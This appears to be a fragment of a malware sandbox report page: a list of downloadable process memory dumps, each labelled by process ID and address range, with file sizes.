Download
memory/704-87-0x0000000010000000-0x00000000105D7000-memory.dmp

Filesize
5.8MB

Download
memory/1100-26-0x0000000010000000-0x00000000105D7000-memory.dmp

Filesize
5.8MB

Download
memory/1160-21-0x0000000073D90000-0x000000007433B000-memory.dmp

Filesize
5.7MB

Download
memory/1160-20-0x00000000027A0000-0x00000000027E0000-memory.dmp

Filesize
256KB

Download
memory/1160-19-0x0000000073D90000-0x000000007433B000-memory.dmp

Filesize
5.7MB

Download
memory/1372-55-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download
memory/1372-52-0x000000001B200000-0x000000001B4E2000-memory.dmp

Filesize
2.9MB

Download
memory/1372-54-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

Filesize
9.6MB

Download
memory/1372-57-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download
memory/1372-58-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download
memory/1372-60-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

Filesize
9.6MB

Download
memory/1372-59-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download
memory/1372-53-0x0000000002220000-0x0000000002228000-memory.dmp

Filesize
32KB

Download
memory/1372-56-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

Filesize
9.6MB

Download
memory/1684-14-0x0000000010000000-0x00000000105D7000-memory.dmp

Filesize
5.8MB

Download
memory/2140-66-0x0000000074740000-0x0000000074CEB000-memory.dmp

Filesize
5.7MB

Download
memory/2140-62-0x0000000001170000-0x00000000011B0000-memory.dmp

Filesize
256KB

Download
memory/2140-61-0x0000000074740000-0x0000000074CEB000-memory.dmp

Filesize
5.7MB

Download
memory/2140-64-0x0000000001170000-0x00000000011B0000-memory.dmp

Filesize
256KB

Download
memory/2140-65-0x0000000001170000-0x00000000011B0000-memory.dmp

Filesize
256KB

Download
memory/2140-63-0x0000000074740000-0x0000000074CEB000-memory.dmp

Filesize
5.7MB

Download
memory/2484-362-0x0000000001110000-0x00000000016E7000-memory.dmp

Filesize
5.8MB

Download
memory/2552-36-0x0000000002400000-0x0000000002408000-memory.dmp

Filesize
32KB

Download
memory/2552-39-0x0000000002710000-0x0000000002790000-memory.dmp

Filesize
512KB

Download
memory/2552-35-0x000000001B280000-0x000000001B562000-memory.dmp

Filesize
2.9MB

Download
memory/2552-37-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2552-40-0x0000000002710000-0x0000000002790000-memory.dmp

Filesize
512KB

Download
memory/2552-41-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2552-43-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2552-42-0x0000000002710000-0x0000000002790000-memory.dmp

Filesize
512KB

Download
memory/2552-38-0x0000000002710000-0x0000000002790000-memory.dmp

Filesize
512KB

Download
memory/2684-121-0x0000000000410000-0x0000000000450000-memory.dmp

Filesize
256KB

Download
memory/2684-129-0x00000000747A0000-0x0000000074D4B000-memory.dmp

Filesize
5.7MB

Download
memory/2684-122-0x00000000747A0000-0x0000000074D4B000-memory.dmp

Filesize
5.7MB

Download
memory/2684-125-0x0000000000410000-0x0000000000450000-memory.dmp

Filesize
256KB

Download
memory/2684-120-0x00000000747A0000-0x0000000074D4B000-memory.dmp

Filesize
5.7MB

Download